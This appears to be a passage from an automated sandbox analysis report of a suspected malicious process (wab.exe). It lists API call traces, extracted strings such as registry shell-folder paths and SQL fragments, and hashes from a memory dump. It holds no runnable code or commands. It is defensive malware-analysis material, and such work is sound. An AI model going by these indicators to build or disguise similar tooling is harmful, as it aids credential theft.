                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                      • String ID: strings
                                                                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                      • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                      Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: FileModuleNamememsetwcscatwcsrchr
• String ID: AE$.cfg$General$EA
• API String ID: 776488737-1622828088
• Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
• Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
• Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D8BD
• GetDlgCtrlID.USER32(?), ref: 0040D8C8
• GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
• memset.MSVCRT ref: 0040D906
• GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
• _wcsicmp.MSVCRT ref: 0040D92F
  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
• Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
• Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
• Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
• Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
• Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
• Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405C27
• GetDlgItem.USER32(?,000003E9), ref: 00405C3A
• GetDlgItem.USER32(?,000003E9), ref: 00405C4F
• GetDlgItem.USER32(?,000003E9), ref: 00405C67
• EndDialog.USER32(?,00000002), ref: 00405C83
• EndDialog.USER32(?,00000001), ref: 00405C98
  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
• SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
• Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
• Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
• Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
• Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
Uniqueness

Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00444D09
• _wcsicmp.MSVCRT ref: 00444D1E
• _wcsicmp.MSVCRT ref: 00444D33
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
• Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
• Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
• Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
• Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
• Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
• Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
• Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32(?,?), ref: 00405F65
• GetWindow.USER32(?,00000005), ref: 00405F7D
• GetWindow.USER32(00000000), ref: 00405F80
  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
• GetWindow.USER32(00000000,00000002), ref: 00405F8C
• GetDlgItem.USER32(?,0000040C), ref: 00405FA2
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
• GetDlgItem.USER32(?,0000040E), ref: 00405FEB
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
• Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                                                                                      • API String ID: 3510742995-2446657581
                                                                                                                                                                                                                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405ABB
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _snwprintfwcscat
                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                      • API String ID: 384018552-4153097237
                                                                                                                                                                                                                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetwcschr
• String ID: 0$6
• API String ID: 2029023288-3849865405
• Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
• Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
• Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
• Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
Uniqueness
Uniqueness Score: -1.00%

APIs
• Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
• memset.MSVCRT ref: 00405455
• memset.MSVCRT ref: 0040546C
• memset.MSVCRT ref: 00405483
• memcpy.MSVCRT ref: 00405498
• memcpy.MSVCRT ref: 004054AD
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
• Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
• Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
• Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
• Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
Uniqueness
Uniqueness Score: -1.00%

APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
• Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
• Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
• Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
• Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
Uniqueness
Uniqueness Score: -1.00%

APIs
• Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
• Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
• Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
• Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
• Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
• Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
• Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
• Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
• Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• <%s>, xrefs: 004100A6
• <?xml version="1.0" ?>, xrefs: 0041007C
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
• Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
• Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
• Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
• Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
• Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
• Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
• Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
• Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
• Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
• Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
• Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
• Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcpy$memsetstrlen
• String ID:
• API String ID: 2350177629-0
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
APIs
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0
APIs
  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
• Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_400000_wab.jbxd
Similarity
• API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• API String ID: 1973883786-0
APIs
• memset.MSVCRT ref: 004116FF
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
